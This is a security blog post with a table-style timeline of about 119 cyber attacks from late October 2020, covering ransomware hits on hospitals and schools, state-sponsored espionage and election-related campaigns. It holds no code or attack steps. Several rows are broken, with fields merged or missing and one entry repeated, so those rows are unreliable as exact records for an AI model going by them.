It’s time to publish the second timeline of October, covering the main cyber attacks happened in the second half of the month, plus some additional events that occurred before this period, but were discovered or disclosed in the considered interval.
This timeline contains 119 events, so apparently the break in the previous timelines was just an illusion. Unsurprisingly ransomware plays an important role in these numbers: almost one out of three events is directly or indirectly related to this threat, which is undoubtedly characterizing this troubled 2020 from an infosec perspective. Even in this timeline you will find many high-profile entities whose data has been encrypted and allegedly fallen in the hands of the attackers in the so-called double extortion attacks. Additionally this period has seen an unprecedented wave of attacks against healthcare institutions carried out with the Ryuk malware.
Another event that characterizes this timeline is the 2020 US General Elections: at least four campaigns purportedly carried out by state-sponsored actors (like Iran and Russia) have tried to leverage this political event to spread misinformation. Another event related to the elections, but driven by criminal purposes, is the theft of $2.3 million from the Wisconsin Republican Party’s account used to help reelect President Donald Trump.
In any case the proximity of the elections influenced also the cyber espionage front, with multiple state-sponsored campaigns by new and old theat actors such as: APT28, APT31, APT35, Turla, Energetic Bear, and MuddyWater.
Last but not least, the days of the mega breaches are not gone: a threat actor has put on sell an aggregate total of 34 million user records that they claim were stolen from seventeen companies during data breaches.
As always, the details are in the timeline! Thanks for sharing it and supporting my work in spreading the risk awareness across the community. Also, don’t forget to follow @paulsparrows on Twitter, or even connect on Linkedin, for the latest updates.
ID
Date
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
1
03/07/2020
?
Technology Management Resources, Inc. (TMR)
Technology Management Resources, Inc. suffers a phishing attack. Many organizations are affected,
Account hijacking
K Financial and insurance activities
CC
US
Technology Management Resources, Inc., TMR
2
24/08/2020
?
Piedmont Community College
Piedmont Community College is hit with a ransomware attack.
Malware
P Education
CC
US
Piedmont Community College, ransomware
3
02/09/2020
?
Timberline Billing Services, Inc.
Timberline Billing Services, Inc. reveals to have suffered a ransomware attack. Many educational organizations are affected.
Malware
K Financial and insurance activities
CC
US
Timberline Billing Services, Inc., ransomware
4
12/10/2020
?
Yazoo County School District
Yazoo County School District is hit with a ransomware attack.
Malware
P Education
CC
US
Yazoo County School District, ransomware
5
14/10/2020
?
U.S. government agencies and enterprise organizations
The Federal Bureau of Investigation (FBI) issues a flash alert warning of hackers stealing data from U.S. government agencies and enterprise organizations via internet-exposed and insecure SonarQube instances.
Misconfigurations
Y Multiple Industries
CE
US
Federal Bureau of Investigation, FBI, SonarQube
6
15/10/2020
?
Columbus City Schools
Columbus City Schools notifies an undisclosed number of people whose names and social security numbers were in an employee’s email account compromised on May 1st.
Account hijacking
P Education
CC
US
Columbus City Schools
7
16/10/2020
APT31
Staffers on the Biden and Trump campaigns
Researchers from Google discover a targeted attack against staffers on the Biden and Trump campaigns abusing legitimate services.
Targeted Attack
O Public administration and defence, compulsory social security
Google reveals that in 2017 a nation-state actor launched a DDoS attack of 2.54 terabits per second.
DDoS
J Information and communication
CC
US
Google
9
16/10/2020
?
Single individuals
Phishing campaigns start to use Basecamp to distribute malware or steal login credentials.
Account hijacking
X Individual
CC
>1
Basecamp
10
16/10/2020
Ranzy Locker
Undisclosed company developing power control solutions
The ThunderX ransomware changes its name to Ranzy Locker and launches a data leak site. The first leaked victim is a company that develops power control solutions.
Malware
C Manufacturing
CC
N/A
ThunderX, ransomware, Ranzy Locker.
11
16/10/2020
?
Single individuals
NPM removes four packages, plutov-slack-client, nodetest199, nodetest1010, npmpubman, which establish connection to remote servers and exfiltrate user data. The packages had collected over 1,000 total downloads.
Researchers from GreatHorn discover a new campaign propagating via open redirector domains and subsidiary domains belonging to multiple global brands, spreading through tens of thousands of mailboxes and targeting business users across industries, geographies, and companies.
Account hijacking
Y Multiple Industries
CC
>1
GreatHorn, open redirectors.
13
16/10/2020
?
Facebook users
Researchers from Cyberint discover a massive Facebook phishing campaign spreading through Facebook Messenger.
Account hijacking
X Individual
CC
>1
Cyberint, Facebook, Messenger
14
16/10/2020
?
Parker County
Parker County is impacted by a computer security incident.
Unknown
O Public administration and defence, compulsory social security
CC
US
Parker County
15
16/10/2020
?
Cosmote
The largest mobile network operator in Greece, Cosmote, reveals that thousands of customers’ information was accessed during a cyber attack that occurred between September 1-5.
Unknown
J Information and communication
CC
GR
Cosmote
16
16/10/2020
?
Commission Kings
Commission Kings, one of the largest affiliate networks catering to a global sports betting and iGaming audience, is hit with a cyber-attack.
Unknown
R Arts entertainment and recreation
CC
US
Commission Kings
17
16/10/2020
?
Florida Department of Business and Professional Regulation
Florida Department of Business and Professional Regulation is investigating "malicious activity" that affected the state's top regulatory agency, causing days of computer system outages and disruptions to online services.
Unknown
O Public administration and defence, compulsory social security
CC
US
Florida Department of Business and Professional Regulation
18
17/10/2020
?
Albion Online
A hacker breaches the forum of Albion Online, a popular free medieval fantasy MMORPG, and steals usernames and password hashes.
WoltLab Suite Vulnerability
R Arts entertainment and recreation
CC
DE
Albion Online, WoltLab Suite
19
17/10/2020
?
narendramodi.in
Researchers from Cyble reveal that donor data of over five lakh (500,000) people has been stolen from narendramodi.in, personal website of Prime Minister Modi, and the details are on sale on the dark web.
Unknown
S Other service activities
CC
IN
Cyble, narendramodi.in, Narenda Modi
20
17/10/2020
?
American Museum of Natural History
The American Museum of Natural History says hackers accessed personal information about visitors in a data breach as a consequence of the Blackbaud ransomware breach.
Malware
R Arts entertainment and recreation
CC
US
American Museum of Natural History, Blackbaud, ransomware.
21
18/10/2020
?
Chenango County
Chenango County is hit with a ransomware attack.
Malware
O Public administration and defence, compulsory social security
CC
US
Chenango County, ransomware
22
19/10/2020
Netwalker
Enel Group
Multinational energy company Enel Group is hit by a Netwalker ransomware attack for the second time this year. The criminals ask a $14 million ransom.
Malware
D Electricity gas steam and air conditioning supply
CC
IT
Enel Group, Netwalker, ransomware
23
19/10/2020
RansomExx
Société de transport de Montréal (STM)
Montreal's Société de transport de Montréal (STM) public transport system is hit with a RansomExx ransomware attack that impacts services and online systems.
Malware
H Transportation and storage
CC
CA
Société de transport de Montréal, STM, RansomExx, Ransomware
24
19/10/2020
?
Coinbase users
A new phishing campaign uses a Coinbase-themed email to install an Office 365 consent app that gives attackers access to a victim's email.
Account hijacking
V Fintech
CC
>1
Coinbase, Office 365
25
19/10/2020
Pakistani Attackers
Organizations in India
Researchers from Kaspersky identify a previously unknown piece of Android spyware related to GravityRAT.
Targeted Attack
Y Multiple Industries
CE
IN
Kaspersky, Android, GravityRAT, India, Pakistan
26
19/10/2020
?
Brazilian bank account holders
Researchers from IBM discover Vizom, a new form of malware using remote overlay attacks to strike Brazilian bank account holders.
Malware
K Financial and insurance activities
CC
BR
IBM, Vizom
27
19/10/2020
?
Korean American Community
Researchers from Trend Micro disclose details about a new watering hole campaign, dubbed Operation Earth Kitsune, targeting the Korean American Community, which exploits flaws in web browsers such as Google Chrome and Internet Explorer to deploy backdoors (CVE-2019-5782, CVE-2020-0674, CVE-2016-0189¸ CVE-2019-1458).
Targeted Attack
X Individual
CE
US
Trend Micro, Operation Earth Kitsune, Korean American Community, Google Chrome, Internet Explorer, CVE-2019-5782, CVE-2020-0674, CVE-2016-0189¸ CVE-2019-1458.
28
19/10/2020
?
Scalable Capital
Scalable Capital notifies customers of a large data breach.
Unknown
K Financial and insurance activities
CC
DE
Scalable Capital
29
19/10/2020
?
Clearwater River Casino & Lodge
Clearwater River Casino & Lodge is hit with a ransomware attack.
Malware
R Arts entertainment and recreation
CC
US
Clearwater River Casino & Lodge, ransomware
30
19/10/2020
?
It’se Ye-Ye Casino
It’se Ye-Ye Casino is hit with a ransomware attack.
Malware
R Arts entertainment and recreation
CC
US
It’se Ye-Ye Casino, ransomware
31
19/10/2020
?
Yorktown School District
The Yorktown School District falls victim to a ransomware attack.
Malware
P Education
CC
US
Yorktown School district, ransomware
32
19/10/2020
?
Croton-Harmon School District
The Croton-Harmon School District falls victim to a ransomware attack.
Malware
P Education
CC
US
Croton-Harmon School District, ransomware
33
20/10/2020
UNC1878
Sopra Steria
French IT services giant Sopra Steria is hit with a Ryuk ransomware cyberattack.
Malware
M Professional scientific and technical activities
CC
FR
Sopra Steria, Ryuk, Ransomware
34
20/10/2020
Chinese state-sponsored attackers
Multiple targets
Cisco warns of attacks actively targeting the CVE-2020-3118 high severity vulnerability found to affect multiple carrier-grade routers that run the company's Cisco IOS XR Software.
CVE-2020-3118 Vulnerability
Y Multiple Industries
CE
>1
Cisco, CVE-2020-3118, China
35
20/10/2020
Chinese state-sponsored attackers
U.S. organizations and interests
The U.S. National Security Agency (NSA) warns that Chinese state-sponsored hackers are exploiting 25 different vulnerabilities in attacks against U.S. organizations and interests.
Multiple Vulnerabilities
Y Multiple Industries
CE
US
China
36
20/10/2020
?
Multiple targets
Google updates Chrome to address five security vulnerabilities, one of them (CVE-2020-15999) actively exploited in the wild.
CVE-2020-15999 Vulnerability
Y Multiple Industries
CC
>1
Google, Chrome, CVE-2020-15999
37
20/10/2020
?
Chrome users
The Chromium extensions of Nano Adblocker and Nano Defender, installed about 300,000 times, are injected with malicious code and discovered to upload user data.
Malware
X Individual
CC
>1
Nano Adblocker, Nano Defender
38
20/10/2020
?
City of Shafter
The City of Shafter is hit with a ransomware attack.
Malware
O Public administration and defence, compulsory social security
CC
US
City of Shafter, ransomware
39
20/10/2020
?
OSF HealthCare System
OSF HealthCare System reveals to have been involved in the Blackbaud ransomware attack.
Malware
Q Human health and social work activities
CC
US
OSF HealthCare System. Blackbaud, ransomware
40
20/10/2020
UNC1878
Dickinson County Healthcare System
The Dickinson County Healthcare System is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, Dickinson County Healthcare System
41
21/10/2020
WastedLocker
Boyne Resorts
US-based ski and golf resort operator Boyne Resorts suffers a cyberattack by the WastedLocker ransomware operation that impacts company-wide reservation systems.
Malware
I Accommodation and food service activities
CC
US
Boyne Resorts, WastedLocker, ransomware
42
21/10/2020
?
Psykoterapiakeskus Vastaamon (Psychotherapy Center Vastaamo)
A threat actor asks a ransom for a client database with confidential information belonging to Psykoterapiakeskus Vastaamon and stolen in a data breach that likely happened almost two years ago.
Unknown
Q Human health and social work activities
CC
FI
Psykoterapiakeskus Vastaamon, Psychotherapy Center Vastaamo
43
20/10/2020
DoppelPaymer
Pascagoula-Gautier School District
The Pascagoula-Gautier School District is hit by a DoppelPaymer ransomware attack
Malware
P Education
CC
US
Pascagoula-Gautier School District, DoppelPaymer, ransomware
44
21/10/2020
?
Nitro Software
Nitro Software issues an advisory to the Australia Stock Exchange, stating that they were affected by a "low impact security incident" but that no customer data was impacted. Shortly after a threat actor is selling the user and document databases, as well as 1TB of documents.
Unknown
M Professional scientific and technical activities
CC
US
Nitro Software
45
21/10/2020
?
iOS users
Researchers from Intego discover six new iOS apps that passed through the notarization process.
Malware
X Individual
CC
>1
Intego, iOS
46
21/10/2020
?
Multiple targets
Researchers from G Data discover a new version of T-RAT, a Windows Remote Administration tool that can be controlled via a Telegram channel.
Malware
Y Multiple Industries
CC
>1
G Data, T-RAT, Telegram
47
21/10/2020
?
Multiple targets
Multiple threat actors are exploiting three bugs on MobileIron MDM (CVE-2020-15505, CVE-2020-15506, CVE-2020-15507) to take over crucial enterprise servers and even orchestrate intrusions inside company networks.
Researchers from Trustwave discover massive databases with detailed information about 186 million US voters and consumers offered for sale on several hacker forums.
Unknown
X Individual
CC
US
Trustwave
49
21/10/2020
MuddyWater AKA SeedWorm, Mercury
Companies and government agencies in the Middle East region
Researchers from Symantec disclose the details of a new campaign by the Iranian group known as Seedworm, using new tools, targeting companies and government agencies in the Middle East region.
Targeted Attack
Y Multiple Industries
CE
>1
Symantec, Seedworm, MuddyWater, Mercury
50
21/10/2020
?
Fort Bragg military base Twitter account
A malicious hacker is blamed for a series of messages posted from the Twitter account of a the Fort Bragg military base.
Account hijacking
O Public administration and defence, compulsory social security
CC
US
Twitter, Fort Bragg
51
21/10/2020
?
Marks & Spencer customer
Criminals impersonate the CEO of Marks & Spencer to trick victims into sharing their bank account details.
Account hijacking
G Wholesale and retail trade
CC
UK
Marks & Spencer
52
21/10/2020
?
City of Salem
The City of Salem is hit with a ransomware attack,
Malware
O Public administration and defence, compulsory social security
CC
US
Salem, ransomware
53
21/10/2020
REvil AKA Sodinokibi
Ansa McAl
The Caribbean’s biggest conglomerate, Ansa McAl, is the victim of a REvil ransomware attack.
Malware
S Other service activities
CC
BB
Ansa McAl, REvil, Sodinokibi, ransomware
54
21/10/2020
LockBit
Multiple targets
Researchers from Sophos reveal the details of a LockBit ransomware campaign targeting multiple organizations.
Malware
Y Multiple Industries
CC
>1
Sophos LockBit, ransomware
55
22/10/2020
?
AdventHealth Foundation
The AdventHealth Foundation alerts donors of the security breach due to the Blackbaud ransomware attack.
Malware
Q Human health and social work activities
CC
US
AdventHealth Foundation, Blackbaud, ransomware
56
22/10/2020
UNC1878
Steelcase
Office furniture giant Steelcase suffers a Ryuk ransomware attack that forces them to shut down the network.
The DHS Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warn that the Russian state-sponsored APT known as Energetic Bear has hacked and stolen data from US government networks during the last two months.
Targeted Attack
O Public administration and defence, compulsory social security
The DHS Cybersecurity and Infrastructure Security Agency (CISA) and the FBI issue an alert to warn that an Iranian threat actor recently accessed voter registration data.
Vulnerability
O Public administration and defence, compulsory social security
CW
US
DHS, CISA, FBI, Iran
59
22/10/2020
?
Vulnerable Content Management Servers
Researchers from Imperva discover KashmirBlack, a highly sophisticated botnet believed to have infected hundreds of thousands of websites by attacking their underlying content management system (CMS) platforms like WordPress, Joomla, Drupal.
Multiple Vulnerabilities
Y Multiple Industries
CC
>1
Imperva, KashmirBlack, WordPress, Joomla, Drupal.
60
22/10/2020
?
Dr. Reddy's Laboratories
Pharmaceutical company Dr Reddy's, which is developing a Covid-19 vaccine, says it has been hit by a cyber-attack.
Unknown
Q Human health and social work activities
CC
IN
Dr. Reddy's Laboratories
61
22/10/2020
?
Office 365 Users
Researchers from Abnormal Security discover a phishing campaign targeting Office 365 users with a fake automated message from Microsoft Teams.
Account hijacking
Y Multiple Industries
CC
>1
Abnormal Security, Office 365, Microsoft Teams.
62
22/10/2020
?
Made in Oregon
Data belonging to 7,800 customers of Made in Oregon is compromised in a breach that lasted six months. According to the gift retailer, an unauthorized party gained access to its e-commerce site between the first week of February 2020 and the last week of August 2020.
Unknown
G Wholesale and retail trade
CC
US
Made in Oregon
63
22/10/2020
?
Robert Koch Institute
Germany’s Robert Koch Institute for infectious disease control is hit with a DDoS attack.
DDoS
M Professional scientific and technical activities
CC
DE
Robert Koch Institute
64
22/10/2020
?
Indian River County
Indian River County officials investigate a cybersecurity incident that has shut down employee emails, VoIP phones, and the county’s website.
Unknown
O Public administration and defence, compulsory social security
CC
US
Indian River County
65
22/10/2020
REvil AKA Sodinokibi
Shionogi & Co.
Japanese pharmaceutical firm Shionogi & Co. reveals that its Taiwanese subsidiary was hit by a ransomware attack earlier this month leading to a data breach, although no information regarding the novel coronavirus vaccine it is currently developing was leaked.
Malware
M Professional scientific and technical activities
CC
TW
REvil, Sodinokibi, Shionogi & Co., ransomware
66
22/10/2020
?
Sonoma Valley Hospital
Sonoma Valley Hospital reports that a security incident on Oct. 11 knocked out its computer systems, and is not fully restored.
Unknown
Q Human health and social work activities
CC
US
Sonoma Valley Hospital
67
22/10/2020
?
Keolis Commuter Services
Keolis Commuter Services reveals to have been hit with a ransomware attack on October 22.
Malware
H Transportation and storage
CC
US
Keolis Commuter Service, ransomware
68
22/10/2020
?
Single individuals
Researchers from Proofpoint discover an updated election-themed phishing campaign conceived to harvest more information, including banking credentials, account data and vehicle identification information.
Account hijacking
X Individual
CC
US
Proofpoint
69
23/10/2020
?
Fragomen, Del Rey, Bernsen & Loewy, LLP
Immigration law firm Fragomen, Del Rey, Bernsen & Loewy, LLP has discloses a data breach that exposed current and former Google employees' personal information, after their network was compromised.
Unknown
M Professional scientific and technical activities
CC
US
Fragomen, Del Rey, Bernsen & Loewy, LLP, Google
70
23/10/2020
?
Single individuals
A new 'Abaddon' remote access trojan (RAT) is the first malware that uses Discord as a full-fledge command and control server.
Malware
X Individual
CC
>1
Abaddon, Discord
71
24/10/2020
?
Multiple targets
A new Emotet campaign switches to a new template that pretends to be a Microsoft Office message stating that Microsoft Word needs to be updated to add a new feature.
Malware
Y Multiple Industries
CC
>1
Emotet, Microsoft Office
72
24/10/2020
?
Android Users
Google removes 15 of 21 Android applications from the official Play Store, following a report from Czech antivirus maker Avast. The apps are infected with a type of malware known as HiddenAds.
Malware
X Individual
CC
>1
Google, Android, Play Store, Avast, HiddenAds
73
24/10/2020
LockBit
Press Trust of India (PTI)
Press Trust of India (PTI) is hit with a LockBit ransomware attack.
Malware
J Information and communication
CC
IN
Press Trust of India, PTI, ransomware
74
24/10/2020
?
Centerstone
Centerstone reveals to have suffered a phishing attack between December 12 and December 16, 2019.
Account hijacking
Q Human health and social work activities
CC
US
Centerstone
75
25/10/2020
?
Arabic-speakers Netflix users
Researchers from Kaspersky discover a wave of phishing attacks that exploit a malicious website disguised as the Arabic-language Netflix page.
Account hijacking
R Arts entertainment and recreation
CC
>1
Kaspersky, Netflix
76
25/10/2020
?
Ledger
Customers of Ledger, the hardware cryptocurrency wallet, are targeted by a phishing attack posing as an email from Ledger support.
Account hijacking
V Fintech
CC
>1
Ledger, Crypto
77
25/10/2020
Eris Loris
Players of the 'Among Us' Android game
Players of the 'Among Us' are spammed with ads from a player named Eris Loris, rendering the game useless.
Unknown
R Arts entertainment and recreation
CC
US
Among Us, Eris Loris
78
26/10/2020
?
Harvest Finance
A hacker steals roughly $24 million worth of cryptocurrency assets from decentralized finance service Harvest Finance.
Unknown
V Fintech
CC
N/A
Harvest Finance
79
26/10/2020
?
Japan’s Nuclear Regulation Authority (NRA)
The Japan’s Nuclear Regulation Authority (NRA) temporarily suspends its email systems, after a possible cyber attack.
Unknown
O Public administration and defence, compulsory social security
CE
JP
Japan’s Nuclear Regulation Authority, NRA
80
26/10/2020
?
President Donald Trump’s campaign website
President Donald Trump’s campaign website is briefly hacked in what appears to be a crude effort to promote a cryptocurrency scam, but the campaign said no sensitive data was exposed.
Defacement
X Individual
CC
US
Donald Trump, Crypto
81
26/10/2020
?
Multiple targets
A few days after the TrickBot takedown, Netscout researchers spotted a new TrickBot Linux that drops the Anchor backdoor.
Malware
Y Multiple Industries
CC
>1
TrickBot, Netscout, TrickBot, Linux, Anchor
82
26/10/2020
?
Mithaas
Mithaas is the victim of a ransomware attack. The attack occurred on August 22.
Malware
I Accommodation and food service activities
CC
IN
Mithaas, ransomware
83
26/10/2020
?
Nando’s Customers
Some customers of popular high street eatery Nando’s are the victims of a credential stuffing attack.
Credential Stuffing
I Accommodation and food service activities
CC
UK
Nando’s
84
26/10/2020
REvil AKA Sodinokibi
Hanover Chamber of Crafts
The Hanover Chamber of Crafts is hit with a REvil ransomware attack.
Malware
S Other service activities
CC
DE
Hanover Chamber of Crafts, REvil ransomware, Sodinokibi
85
26/10/2020
?
Department of Workforce Development in Wisconsin
The Department of Workforce Development in Wisconsin suffers a credential stuffing attack.
Credential Stuffing
O Public administration and defence, compulsory social security
CC
US
Department of Workforce Development, Wisconsin
86
27/10/2020
?
Individuals and organizations in South Korea, Japan, and the United States
The Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the Cyber Command Cyber National Mission Force (CNMF), release an alert about the North Korean Threat Actor Kimsuky (AKA Hidden Cobra) targeting individuals and organizations in South Korea, Japan, and the United States.
Targeted Attack
Y Multiple Industries
CE
>1
CISA, FBI, and the Cyber Command Cyber National Mission Force, CNMF, North Korea, Kimsuky, Hidden Cobra, South Korea, Japan, United States
87
27/10/2020
?
Single individuals in the US
Researchers from Digital Shadows reveal that threat actors from Russia are trying to undermine the US presidential election with disinformation campaigns.
Fake websites, social networks accounts.
X Individual
CW
US
Digital Shadows, Russia
88
27/10/2020
?
Single individuals in the US
Researchers from Digital Shadows reveal that threat actors from Iran are trying to undermine the US presidential election with disinformation campaigns.
Fake websites, social networks accounts.
X Individual
CW
US
Digital Shadows, Iran
89
27/10/2020
?
Isentia
Media monitoring giant Isentia is hit with a ransomware attack.
Malware
M Professional scientific and technical activities
CC
AU
Isentia, ransomware
90
27/10/2020
?
Single individuals
Researchers from Sophos discover a phishing campaign carried out via fraudulent Facebook messages alleging copyright infringement and threatening to take down pages, unless users enter logins, passwords and 2FA codes.
Account hijacking
X Individual
CC
>1
Sophos, Facebook, copyright infringement
91
28/10/2020
?
17 companies
A threat actor sells account databases containing an aggregate total of 34 million user records that they claim were stolen from seventeen companies during data breaches.
Researchers from Microsoft disclose that Iranian state-sponsored hackers successfully hacked into the email accounts of multiple high-profile individuals and potential attendees at this year's Munich Security Conference and the Think 20 (T20) summit.
Targeted Attack
O Public administration and defence, compulsory social security
Researchers from Microsoft disclose that Iranian state-sponsored hackers successfully hacked into the email accounts of multiple high-profile individuals and potential attendees at this year's Munich Security Conference and the Think 20 (T20) summit.
Targeted Attack
O Public administration and defence, compulsory social security
Hackers published online at least 38,000 documents stolen from Gunnebo Group in March 2020.
Unknown
C Manufacturing
CC
SE
Gunnebo Group
96
28/10/2020
?
Jewish General Hospital
The Jewish General Hospital is hit with a cyber attack,
Unknown
Q Human health and social work activities
CC
US
Jewish General Hospital
97
28/10/2020
?
?
Virginia Beach City Public Schools investigates after someone hacked into a Zoom classroom filled with 5th graders and showed a picture of a man’s body parts on the screen.
Zoom bombing
P Education
CC
US
Virginia Beach City Public Schools, Zoom
98
28/10/2020
?
Chatham County
Chatham County is hit with a ransomware attack.
Malware
O Public administration and defence, compulsory social security
CC
US
Chatham County, ransomware
99
29/10/2020
UNC1878
Wyckoff Heights Medical Center
Wyckoff Heights Medical Center is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, Wyckoff Heights Medical Center
100
29/10/2020
UNC1878
University of Vermont Health Network
University of Vermont Health Network is hit with a Ryuk ransomware attack. 6 hospitals are affected.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, University of Vermont Health Network
101
29/10/2020
UNC1878
Sky Lakes Medical Center
The Sky Lakes Medical Center is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, Sky Lakes Medical Center
102
29/10/2020
UNC1878
St. Lawrence Health System
The St. Lawrence Health System is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, St. Lawrence Health System
103
29/10/2020
?
Lazada Redmart
Singapore's largest online grocery store Lazada Redmart has suffered a data breach after 1.1 million user accounts were put up for sale on a hacker forum.
Unknown
G Wholesale and retail trade
CC
SG
Lazada Redmart
104
29/10/2020
?
Wisconsin Republican Party’s account
Hackers steal $2.3 million from the Wisconsin Republican Party’s account used to help reelect President Donald Trump.
Account hijacking
S Other service activities
CC
US
Wisconsin, Republican Party
105
29/10/2020
?
Vulnerable Oracle WebLogic servers
Threat actors are scanning servers running Oracle WebLogic instances vulnerable to CVE-2020-14882.
CVE-2020-14882 Vulnerability
Y Multiple Industries
CC
US
Oracle WebLogic, CVE-2020-14882
106
29/10/2020
?
Multiple targets
Microsoft warns that threat actors are continuing to actively exploit systems unpatched against the ZeroLogon vulnerability (CVE-2020-1472).
CVE-2020-1472 Vulnerability
Y Multiple Industries
CC
>1
Microsoft, ZeroLogon, CVE-2020-1472
107
29/10/2020
Turla AKA VENOMOUS BEAR, Waterbug
Ministries of foreign affairs & national parliaments
The US Cyber Command shares information on malware implants (ComRAT) used by the Russian hacking group Turla.
Targeted Attack
O Public administration and defence, compulsory social security
CE
>1
Turla, VENOMOUS BEAR, Waterbug, US Cyber Command, ComRAT
108
29/10/2020
APT28 AKA Sofacy, Fancy Bear, Sednit, STRONTIUM
Governments around the world
The US Cyber Command shares information on malware implants (Zebrocy) used by the Russian hacking group APT28.
Targeted Attack
O Public administration and defence, compulsory social security
CE
>1
APT28, Sofacy, Fancy Bear, Sednit, STRONTIUM, US Cyber Command, Zebrocy
109
29/10/2020
?
Multiple targets
Researchers from Palo Alto Networks discover a new Emotet campaign abusing parked domains and impersonating McAfee.
Malware
Y Multiple Industries
CC
>1
Palo Alto Networks, Emotet, McAfee
110
29/10/2020
Roaming Mantis
U.S. Android and iPhone mobile banking users
Researchers from Kaspersky reveal that the Roaming Mantis group is targeting the US with the Wroba mobile banking trojan that can steal information, harvest financial data and send texts to self-propagate.
Malware
K Financial and insurance activities
CC
US
Kaspersky, Roaming Mantis, Wroba, Android, iOS
111
29/10/2020
DoNot
Kashmiri non-profit organizations and Pakistani government officials
Researchers from Cisco Talos discover Firestarter, a new Android mobile malware using Google Firebase as a command and control infrastructure.
Malware
O Public administration and defence, compulsory social security
CE
PK
Cisco Talos, Firestarter, Android, Google Firebase, Kashmir
112
29/10/2020
?
Multiple targets
Researchers from Inky reveal that cybercriminals are hijacking legitimate email accounts from more than a dozen universities – including Purdue University, University of Oxford, and Stanford University – and using the accounts to bypass detection and trick victims into handing over their email credentials or installing malware.
Account hijacking
Y Multiple Industries
CC
>1
Inky, Purdue University, University of Oxford, Stanford University
113
30/10/2020
?
Multiple targets
Researchers from Google's Project Zero disclose a zero-day vulnerability in the Windows kernel and actively exploited in targeted attacks (CVE-2020-17087) along with CVE-2020-15999.
DHS CISA and the FBI share more info on how an Iranian state-sponsored hacking group was able to harvest voter registration info from U.S. state websites, including election sites, and use the harvested data to send fake Proud Boys voter intimidation emails to Democratic voters attempting to convince them to vote for President Trump.
>1
O Public administration and defence, compulsory social security
CW
US
DHS, CISA, FBI, Democratic Party, Proud Boys, President Trump
115
30/10/2020
?
Single individuals
Researchers from Netskope discover a new campaign spreading spam messages being shared via Google Docs.
Malicious Spam
X Individual
CC
>1
Netskope, Google Docs.
116
30/10/2020
NetWalker
CMC
CMC in Ravenna is hit with a NetWalker ransomware attack.
Malware
C Manufacturing
CC
IT
CMC, NetWalker, ransomware
117
30/10/2020
?
Rady Children’s Hospital
The Rady Children’s Hospital reveals to have been involved in the Blackbaud ransomware attack.
Malware
Q Human health and social work activities
CC
US
Rady Children’s Hospital, Blackbaud, ransomware
118
31/10/2020
?
Vulnerable Oracle WebLogic servers
Threat actors are actively exploiting Oracle WebLogic servers unpatched against CVE-2020-14882 to deploy Cobalt Strike beacons which allow for persistent remote access to compromised devices.
CVE-2020-14882 Vulnerability
Y Multiple Industries
CC
US
Oracle WebLogic, CVE-2020-14882, Cobalt Strike
119
31/10/2020
?
Multiple targets
A new Emotet campaign sends out spam emails that invite the victim to a Halloween party.
Malware
Y Multiple Industries
CC
>1
Emotet, Halloween
120
31/10/2020
REvil AKA Sodinokibi
Gaming Partners International (GPI)
The REvil ransomware operators claim to have hacked Gaming Partners International (GPI)
